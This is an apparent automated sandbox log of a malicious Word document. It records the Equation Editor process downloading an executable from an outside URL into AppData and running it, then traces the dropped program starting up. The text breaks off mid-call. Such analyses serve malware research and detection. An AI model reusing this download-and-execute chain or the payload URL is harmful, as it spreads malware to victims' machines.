# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 04.08.2020 23:24:20.230 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe" page_root = "0x3b68a000" os_pid = "0xbf4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x458" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xc98 Thread: id = 2 os_tid = 0xc5c Thread: id = 3 os_tid = 0xc58 Thread: id = 4 os_tid = 0xc40 Thread: id = 5 os_tid = 0xc3c Thread: id = 6 os_tid = 0xc30 Thread: id = 7 os_tid = 0xc10 Thread: id = 8 os_tid = 0xc0c Thread: id = 9 os_tid = 0xc08 Thread: id = 10 os_tid = 0xc04 Thread: id = 11 os_tid = 0xbe0 Thread: id = 12 os_tid = 0xbdc Thread: id = 13 os_tid = 0xbec Thread: id = 14 os_tid = 0xb44 Thread: id = 15 os_tid = 0xb54 Thread: id = 16 os_tid = 0x820 Thread: id = 17 os_tid = 0xaf8 Thread: id = 18 os_tid = 0xaf0 Thread: id = 19 os_tid = 0xabc Thread: id = 20 os_tid = 0xaf4 Thread: id = 21 os_tid = 0x1c4 Thread: id = 23 os_tid = 0xd98 Thread: id = 26 os_tid = 0xda8 Thread: id = 146 os_tid = 0xf48 Process: id = "2" image_name = "eqnedt32.exe" filename = "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x22ed3000" os_pid = "0xd30" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x250" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 22 os_tid = 0xd34 [0086.441] GlobalLock (hMem=0x2d20074) returned 0x38b0048 [0086.442] GetProcAddress (hModule=0x75b90000, lpProcName="ExpandEnvironmentStringsW") returned 0x75ba4173 [0086.442] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\DUE.exe", lpDst=0x18eeb4, nSize=0x104 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe") returned 0x2a [0086.442] LoadLibraryW (lpLibFileName="UrlMon") returned 0x757a0000 [0088.753] GetProcAddress (hModule=0x757a0000, lpProcName="URLDownloadToFileW") returned 0x758366f6 [0088.755] URLDownloadToFileW (param_1=0x0, param_2="http://sadiqgill.com/assets/fonts/EIC.exe", param_3="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\due.exe"), param_4=0x0, param_5=0x0) returned 0x0 [0096.433] GetProcAddress (hModule=0x75b90000, lpProcName="WideCharToMultiByte") returned 0x75ba170d [0096.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe", cchWideChar=-1, lpMultiByteStr=0x18f0d0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe", lpUsedDefaultChar=0x0) returned 42 [0096.433] GetProcAddress (hModule=0x75b90000, lpProcName="WinExec") returned 0x75c22c21 [0096.433] WinExec (lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe", uCmdShow=0x1) returned 0x21 [0097.557] GetProcAddress (hModule=0x75b90000, lpProcName="ExitProcess") returned 0x75ba7a10 [0097.557] ExitProcess (uExitCode=0x0) Thread: id = 24 os_tid = 0xd9c Thread: id = 25 os_tid = 0xda4 Thread: id = 27 os_tid = 0xdac Thread: id = 28 os_tid = 0xdb0 Thread: id = 29 os_tid = 0xdb4 Thread: id = 30 os_tid = 0xdb8 Thread: id = 31 os_tid = 0xdbc Thread: id = 51 os_tid = 0xdc0 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x77437000" os_pid = "0x3fc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e419" [0xc000000f], "LOCAL" [0x7] Thread: id = 32 os_tid = 0xd10 Thread: id = 33 os_tid = 0xd0c Thread: id = 34 os_tid = 0xd08 Thread: id = 35 os_tid = 0xc9c Thread: id = 36 os_tid = 0xc7c Thread: id = 37 os_tid = 0xb74 Thread: id = 38 os_tid = 0x7c0 Thread: id = 39 os_tid = 0x7bc Thread: id = 40 os_tid = 0x7b8 Thread: id = 41 os_tid = 0x790 Thread: id = 42 os_tid = 0x77c Thread: id = 43 os_tid = 0x764 Thread: id = 44 os_tid = 0x75c Thread: id = 45 os_tid = 0x738 Thread: id = 46 os_tid = 0x150 Thread: id = 47 os_tid = 0x128 Thread: id = 48 os_tid = 0x118 Thread: id = 49 os_tid = 0xf0 Thread: id = 50 os_tid = 0xc8 Thread: id = 52 os_tid = 0xe20 Process: id = "4" image_name = "due.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\due.exe" page_root = "0x2ea74000" os_pid = "0xe6c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xd30" cmd_line = "C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 53 os_tid = 0xe70 [0096.623] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0096.623] GetKeyboardType (nTypeFlag=0) returned 4 [0096.623] GetCommandLineA () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" [0096.624] GetStartupInfoA (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0096.624] GetVersion () returned 0x1db10106 [0096.624] GetVersion () returned 0x1db10106 [0096.624] GetCurrentThreadId () returned 0xe70 [0096.624] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f8, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\due.exe")) returned 0x29 [0096.624] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8d3, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\due.exe")) returned 0x29 [0096.624] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0096.671] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0096.671] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0096.671] lstrcpynA (in: lpString1=0x18f8d3, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe", iMaxLength=261 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" [0096.671] GetThreadLocale () returned 0x409 [0096.672] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9e3, cchData=5 | out: lpLCData="ENU") returned 4 [0096.673] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe") returned 41 [0096.673] lstrcpynA (in: lpString1=0x18f8f9, lpString2="ENU", iMaxLength=223 | out: lpString1="ENU") returned="ENU" [0096.673] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0096.673] lstrcpynA (in: lpString1=0x18f8f9, lpString2="EN", iMaxLength=223 | out: lpString1="EN") returned="EN" [0096.673] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0096.673] LoadStringA (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0096.673] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x5d6228 [0096.674] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1de0000 [0096.674] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x5d7228 [0096.674] VirtualAlloc (lpAddress=0x1de0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1de0000 [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0096.674] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xffea, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0096.675] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0096.675] GetVersionExA (in: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0096.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75b90000 [0096.675] GetProcAddress (hModule=0x75b90000, lpProcName="GetDiskFreeSpaceExA") returned 0x75c2434f [0096.675] GetThreadLocale () returned 0x409 [0096.675] GetThreadLocale () returned 0x409 [0096.675] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jan") returned 4 [0096.675] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd78, cchData=256 | out: lpLCData="January") returned 8 [0096.675] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Feb") returned 4 [0096.675] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd78, cchData=256 | out: lpLCData="February") returned 9 [0096.675] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mar") returned 4 [0096.675] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="March") returned 6 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Apr") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="April") returned 6 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jun") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="June") returned 5 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jul") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="July") returned 5 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Aug") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="August") returned 7 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sep") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd78, cchData=256 | out: lpLCData="September") returned 10 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Oct") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd78, cchData=256 | out: lpLCData="October") returned 8 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Nov") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd78, cchData=256 | out: lpLCData="November") returned 9 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Dec") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd78, cchData=256 | out: lpLCData="December") returned 9 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sun") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sunday") returned 7 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mon") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Monday") returned 7 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tue") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tuesday") returned 8 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wed") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wednesday") returned 10 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thu") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thursday") returned 9 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Fri") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Friday") returned 7 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sat") returned 4 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Saturday") returned 9 [0096.676] GetThreadLocale () returned 0x409 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="$") returned 2 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0096.676] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fecc, cchData=2 | out: lpLCData=".") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="2") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fecc, cchData=2 | out: lpLCData="/") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0096.677] GetThreadLocale () returned 0x409 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0096.677] GetThreadLocale () returned 0x409 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fecc, cchData=2 | out: lpLCData=":") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="AM") returned 3 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="PM") returned 3 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0096.677] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0096.677] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x75e60000 [0096.677] GetProcAddress (hModule=0x75e60000, lpProcName="VariantChangeTypeEx") returned 0x75e64c28 [0096.677] GetProcAddress (hModule=0x75e60000, lpProcName="VarNeg") returned 0x75edc802 [0096.677] GetProcAddress (hModule=0x75e60000, lpProcName="VarNot") returned 0x75edec66 [0096.677] GetProcAddress (hModule=0x75e60000, lpProcName="VarAdd") returned 0x75e85934 [0096.677] GetProcAddress (hModule=0x75e60000, lpProcName="VarSub") returned 0x75edd332 [0096.677] GetProcAddress (hModule=0x75e60000, lpProcName="VarMul") returned 0x75eddbd4 [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarDiv") returned 0x75ede405 [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarIdiv") returned 0x75edf00a [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarMod") returned 0x75edf15e [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarAnd") returned 0x75e85a98 [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarOr") returned 0x75edecfa [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarXor") returned 0x75edee2e [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarCmp") returned 0x75e7b0dc [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarI4FromStr") returned 0x75e76fab [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarR4FromStr") returned 0x75e801a0 [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarR8FromStr") returned 0x75e7699e [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarDateFromStr") returned 0x75e86ba7 [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarCyFromStr") returned 0x75ea6c12 [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarBoolFromStr") returned 0x75e7dbd1 [0096.678] GetProcAddress (hModule=0x75e60000, lpProcName="VarBstrFromCy") returned 0x75e87fdc [0096.679] GetProcAddress (hModule=0x75e60000, lpProcName="VarBstrFromDate") returned 0x75e77a2a [0096.679] GetProcAddress (hModule=0x75e60000, lpProcName="VarBstrFromBool") returned 0x75e80355 [0096.679] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8 [0096.679] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xac [0096.679] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0096.679] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x770d0000 [0096.679] GetDC (hWnd=0x0) returned 0x1010ac2 [0096.679] GetDeviceCaps (hdc=0x1010ac2, index=90) returned 96 [0096.679] ReleaseDC (hWnd=0x0, hDC=0x1010ac2) returned 1 [0096.679] GetDC (hWnd=0x0) returned 0x1010ac2 [0096.679] GetDeviceCaps (hdc=0x1010ac2, index=104) returned 0 [0096.679] ReleaseDC (hWnd=0x0, hDC=0x1010ac2) returned 1 [0096.679] CreatePalette (plpal=0x18fb30) returned 0x5f080b05 [0096.680] GetStockObject (i=7) returned 0x1b00017 [0096.680] GetStockObject (i=5) returned 0x1900015 [0096.680] GetStockObject (i=13) returned 0x18a002e [0096.680] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0096.680] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x18fb2c, 